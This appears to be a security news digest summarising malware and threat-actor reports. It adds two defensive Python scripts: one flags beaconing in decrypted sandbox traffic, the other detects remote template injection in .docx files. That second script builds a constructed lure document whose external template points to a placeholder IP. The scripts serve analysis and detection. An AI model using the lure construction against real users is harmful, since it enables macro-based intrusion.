How to Analyze Malware’s Network Traffic in A Sandbox

December 13, 2023 at 07:12AM Examining a sample's network traffic is a core part of malware analysis, and it brings recurring obstacles: TLS hides request contents, and some samples only misbehave for specific regions. A man-in-the-middle (MITM) proxy decrypts HTTPS traffic and exposes the details of the malicious activity; FakeNET helps identify the malware family; and a residential proxy bypasses geo-restrictions so evasive samples can be observed. All of these are available in the cloud-based ANY.RUN sandbox …
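Once a MITM proxy has stripped TLS, the analyst still has to find the malicious requests among everything else the sandbox VM does. The following script is an added example, not code from the ANY.RUN post summarized above: it triages decrypted HTTP(S) flows exported from the proxy, grouping requests by endpoint and flagging those with near-constant inter-request timing (beaconing) and those sent to a bare IP address. The JSON Lines record format (ts, method, host, path, user_agent, status, resp_bytes), the sample flows, the hostnames and the 203.0.113.10 address are all constructed for this example.

```python
"""Triage decrypted HTTP(S) flows from a sandbox MITM proxy for C2-like behaviour.

Input format is an assumption of this example: one JSON object per line with
ts (seconds), method, host, path, user_agent, status and resp_bytes, i.e. the
fields an analyst would export from the proxy's flow log.
"""
import ipaddress
import json
import statistics
from collections import defaultdict

# Constructed sample, not real capture data: a fake implant beaconing every
# ~60 s with jitter, one upload to a bare IP, and two benign static fetches.
SAMPLE_FLOWS = "\n".join(json.dumps(f) for f in [
    {"ts": 0.0, "method": "POST", "host": "cdn-update.example", "path": "/api/v1/beacon?id=7",
     "user_agent": "Mozilla/4.0", "status": 200, "resp_bytes": 12},
    {"ts": 5.0, "method": "GET", "host": "static.example", "path": "/lib.js",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "status": 200, "resp_bytes": 48211},
    {"ts": 7.0, "method": "GET", "host": "static.example", "path": "/app.css",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "status": 200, "resp_bytes": 9130},
    {"ts": 60.0, "method": "POST", "host": "cdn-update.example", "path": "/api/v1/beacon?id=7",
     "user_agent": "Mozilla/4.0", "status": 200, "resp_bytes": 12},
    {"ts": 90.0, "method": "POST", "host": "203.0.113.10", "path": "/upload",
     "user_agent": "Mozilla/4.0", "status": 200, "resp_bytes": 0},
    {"ts": 121.0, "method": "POST", "host": "cdn-update.example", "path": "/api/v1/beacon?id=8",
     "user_agent": "Mozilla/4.0", "status": 200, "resp_bytes": 12},
    {"ts": 180.0, "method": "POST", "host": "cdn-update.example", "path": "/api/v1/beacon?id=9",
     "user_agent": "Mozilla/4.0", "status": 200, "resp_bytes": 12},
    {"ts": 241.0, "method": "POST", "host": "cdn-update.example", "path": "/api/v1/beacon?id=10",
     "user_agent": "Mozilla/4.0", "status": 200, "resp_bytes": 12},
])


def parse_flows(text):
    """Parse JSON Lines into a list of flow dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_beacons(flows, min_hits=4, max_cv=0.2):
    """Return endpoints hit at least min_hits times with near-constant spacing.

    Regularity is the coefficient of variation (stdev / mean) of the gaps
    between consecutive requests: an implant with mild jitter scores well
    below max_cv, bursty browser traffic does not. Query strings are dropped
    so a per-request id does not split one endpoint into many.
    """
    by_endpoint = defaultdict(list)
    for f in flows:
        key = (f["host"], f["method"], f["path"].split("?", 1)[0])
        by_endpoint[key].append(float(f["ts"]))

    beacons = []
    for (host, method, path), times in by_endpoint.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            beacons.append({"host": host, "method": method, "path": path,
                            "hits": len(times),
                            "interval_s": statistics.median(gaps),
                            "cv": round(cv, 3)})
    return beacons


def raw_ip_hosts(flows):
    """Hosts that are literal IP addresses rather than DNS names, sorted."""
    found = set()
    for f in flows:
        try:
            ipaddress.ip_address(f["host"])
        except ValueError:
            continue
        found.add(f["host"])
    return sorted(found)


def triage(text):
    """Run both checks plus a host inventory over a JSON Lines flow export."""
    flows = parse_flows(text)
    return {
        "hosts": sorted({f["host"] for f in flows}),
        "beacons": detect_beacons(flows),
        "raw_ip_hosts": raw_ip_hosts(flows),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_FLOWS), indent=2))
```

The thresholds are deliberately loose: a sample that sleeps for a random 50 to 70 seconds between check-ins still has a coefficient of variation around 0.1, while a page load fetching the same CDN path twice a second apart and once ten minutes later does not. Lower min_hits for short sandbox runs, and treat a hit on a bare IP as a pointer to look at the decrypted body, not as a verdict on its own.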

Microsoft: Mystery Group Targeting Telcos Linked to Chinese APTs

December 11, 2023 at 11:08AM Researchers have linked the Sandman threat group, known for cyberattacks on telecom providers, to a growing network of Chinese government-backed advanced persistent threat (APT) groups. The joint assessment by Microsoft, SentinelLabs, and PwC points to shared tradecraft and overlaps in malware development, and it underlines the value of collaboration across the security community. From …

New Stealthy ‘Krasue’ Linux Trojan Targeting Telecom Firms in Thailand

December 7, 2023 at 01:54AM A newly discovered Linux trojan named Krasue has been targeting telecom firms in Thailand since 2021, giving its operators persistent access to victim networks. It relies on rootkits to stay hidden, but its origins and initial delivery method remain unclear. Code similarities with the XorDdos malware point to a possible common author. Analysts stress the need for ongoing vigilance. Key …

New Threat Actor ‘AeroBlade’ Emerges in Espionage Attack on U.S. Aerospace

December 5, 2023 at 03:12AM A new threat actor, AeroBlade, targeted a U.S. aerospace company in what appears to be an espionage operation. The BlackBerry team identified the intrusion, which combined spear-phishing, remote template injection, and a malicious VBA macro. The activity began in September 2022 and grew stealthier over time, culminating in July 2023 with a reverse …
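Remote template injection, one of the techniques named above, works by giving a .docx an external attachedTemplate relationship, so that Word fetches a .dotm over the network when the document opens and runs any macros it carries; the lure file itself contains no macro and passes static checks that look for one. The following script is an added example, not the BlackBerry team's tooling or a sample from this campaign: it builds a minimal constructed .docx in memory, with and without such a relationship, and scans the package's .rels parts for external relationships that point at a remote URL. The 203.0.113.10 template URL is a placeholder.

```python
"""Detect remote (external) attached-template relationships in a .docx package.

The document built here is a constructed minimal OOXML package for the demo,
not a real malicious sample; the template URL is a placeholder.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
HYPERLINK = ("http://schemas.openxmlformats.org/officeDocument/2006/"
             "relationships/hyperlink")
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def build_docx(template_url=None):
    """Return bytes of a minimal .docx; with template_url, attach an external template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        settings = ('<?xml version="1.0" encoding="UTF-8"?>'
                    f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">')
        rels = ('<?xml version="1.0" encoding="UTF-8"?>'
                f'<Relationships xmlns="{PKG_REL_NS}">')
        if template_url:
            # This pair is the whole trick: settings.xml names a template by
            # relationship id, and the .rels part resolves it to a remote URL.
            settings += '<w:attachedTemplate r:id="rId1"/>'
            rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                     f'Target="{template_url}" TargetMode="External"/>')
        z.writestr("word/settings.xml", settings + "</w:settings>")
        z.writestr("word/_rels/settings.xml.rels", rels + "</Relationships>")
    return buf.getvalue()


def external_targets(docx_bytes):
    """Return (rels part, relationship kind, target) for external, remote-scheme relationships.

    Hyperlinks are external by design and are skipped; any other relationship
    whose target is http/https/ftp (attachedTemplate, oleObject, ...) is
    reported, since none of those should leave the package in a clean document.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "")
                target = rel.get("Target", "")
                if rel_type == HYPERLINK:
                    continue
                if urlsplit(target).scheme.lower() in ("http", "https", "ftp"):
                    hits.append((name, rel_type.rsplit("/", 1)[-1], target))
    return hits


def has_remote_template(docx_bytes):
    """True when any .rels part carries an external attachedTemplate relationship."""
    return any(kind == "attachedTemplate" for _, kind, _ in external_targets(docx_bytes))


if __name__ == "__main__":
    suspicious = build_docx("http://203.0.113.10/invoice.dotm")
    print(external_targets(suspicious))
    print(has_remote_template(build_docx()))
```

Scanning every .rels part rather than only word/_rels/settings.xml.rels matters in practice: the same external-relationship pattern appears in other parts (for example an oleObject relationship in document.xml.rels), and a scanner keyed to one file name misses them. The check is static and needs no macro engine, which is exactly why the technique is attractive to an attacker whose lure would otherwise be flagged for containing VBA.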

Black Basta ransomware operation nets over $100M from victims in less than two years

November 30, 2023 at 08:24AM Since April 2022, the Black Basta ransomware group has collected over $107 million in ransom payments, with at least 90 of its 300-plus victims paying. The group likely evolved from Conti, uses Qakbot to deploy its malware, and follows the usual ransomware-as-a-service payment split. Its breach of Capita triggered widespread legal action. …

GoTitan Botnet Spotted Exploiting Recent Apache ActiveMQ Vulnerability

November 29, 2023 at 12:18AM A critical remote code execution flaw in Apache ActiveMQ (CVE-2023-46604) is being exploited to deploy the GoTitan botnet and the PrCtrl RAT, both of which give attackers remote control of infected systems. Threat groups including Lazarus are using the same flaw to deliver other payloads, among them DDoS bots and cryptojackers. …

New Rust-based SysJoker backdoor linked to Hamas hackers

November 27, 2023 at 09:57AM A new variant of the multi-platform 'SysJoker' malware has been discovered, rewritten from scratch in Rust. First documented in early 2022, SysJoker runs on Windows, Linux, and macOS. The new variant has been linked to 'Operation Electric Powder,' believed …

Black Friday 2023: Get 25% off the Zero2Automated malware analysis course

November 23, 2023 at 12:35PM The Zero2Automated malware analysis and reverse-engineering course is running a Black Friday through Cyber Monday sale with 25% off sitewide, including gift certificates and courses. Started in May 2020 by Vitali Kremez and Daniel Bunce, the course provides over 25 hours of content and an online community of peers …

Alert: New WailingCrab Malware Loader Spreading via Shipping-Themed Emails

November 23, 2023 at 08:24AM Shipping-themed emails are being used to distribute the WailingCrab malware loader, which is built from several components and is associated with the threat actor TA544. It prioritizes stealth, relying on compromised websites and legitimate platforms such as Discord for communication; newer variants use the MQTT protocol for command-and-control, …

ClearFake Campaign Expands to Deliver Atomic Stealer on macOS Systems

November 22, 2023 at 02:24AM The macOS information stealer Atomic is now being delivered through ClearFake, a fake browser-update chain. This is the first time a social engineering campaign originally aimed at Windows users has expanded to macOS. Atomic Stealer is commercial malware that harvests data from web browsers and cryptocurrency wallets. ClearFake …